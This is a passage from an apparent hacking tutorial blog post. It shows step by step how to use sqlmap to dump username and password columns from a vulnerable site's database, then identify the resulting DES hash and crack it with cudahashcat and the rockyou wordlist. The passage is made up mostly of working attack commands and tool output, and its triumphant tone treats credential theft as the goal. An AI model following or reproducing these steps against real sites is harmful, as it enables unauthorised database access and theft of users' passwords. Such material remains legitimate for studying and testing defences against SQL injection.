sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_login --dump

Guess what, we now have the username from the database:

[10:58:39] [INFO] retrieved: userX
[10:58:40] [INFO] analyzing table dump for possible password hashes



Almost there, we now only need the password to for this user.. Next shows 
just that..

Step 6: Extract password from target columns of target table of selected 
database using SQLMAP SQL Injection

You’re probably getting used to on how to use SQLMAP SQL Injection tool. 
Use the following command to extract password for the user.

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_password --dump

[10:59:15] [INFO] the SQL query used returns 1 entries
[10:59:17] [INFO] retrieved: 24iYBc17xK0e.
[10:59:18] [INFO] analyzing table dump for possible password hashes
Database: sqldummywebsite
Table: user_info
[1 entry]
+---------------+
| user_password |
+---------------+
| 24iYBc17xK0e. |
+---------------+




But hang on, this password looks funny. This can’t be someone’s password..
 Someone who leaves their website vulnerable like that just can’t have a
 password like that.

That is exactly right. This is a hashed password. What that means, the
 password is encrypted and now we need to decrypt it.

I have covered how to decrypt password extensively on this Cracking MD5, phpBB,
 MySQL and SHA1 passwords with Hashcat on Kali Linux post. If you’ve missed it, you’re missing out a lot.

I will cover it in short here but you should really learn how to use hashcat.


Step 7: Cracking password

So the hashed password is 24iYBc17xK0e. . How do you know what type of hash is 
that?
Step 7.a: Identify Hash type

Luckily, Kali Linux provides a nice tool and we can use that to identify which
 type of hash is this. In command line type in the following command and on 
prompt paste the hash value:

hash-identifier




Excellent. So this is DES(Unix) hash.
Step 7.b: Crack HASH using cudahashcat

First of all I need to know which code to use for DES hashes. So let’s check that:

cudahashcat --help | grep DES




So it’s either 1500 or 3100. But it was a MYSQL Database, so it must be 1500.

I am running a Computer thats got NVIDIA Graphics card. That means I will
 be using cudaHashcat. On my laptop, I got an AMD ATI Graphics cards, so I 
will be using oclHashcat on my laptop. If you’re on VirtualBox or VMWare, 
neither cudahashcat nor oclhashcat will work. You must install Kali in either
 a persisitent USB or in Hard Disk. Instructions are in the website, search around.

I saved the hash value 24iYBc17xK0e. in DES.hash file. Following is the 
command I am running:


cudahashcat -m 1500 -a 0 /root/sql/DES.hash /root/sql/rockyou.txt





Interesting find: Usuaul Hashcat was unable to determine the code for
 DES hash. (not in it’s help menu). Howeverm both cudaHashcat and oclHashcat
 found and cracked the key.

Anyhow, so here’s the cracked password: abc123. 24iYBc17xK0e.:abc123

Sweet, we now even have the password for this user.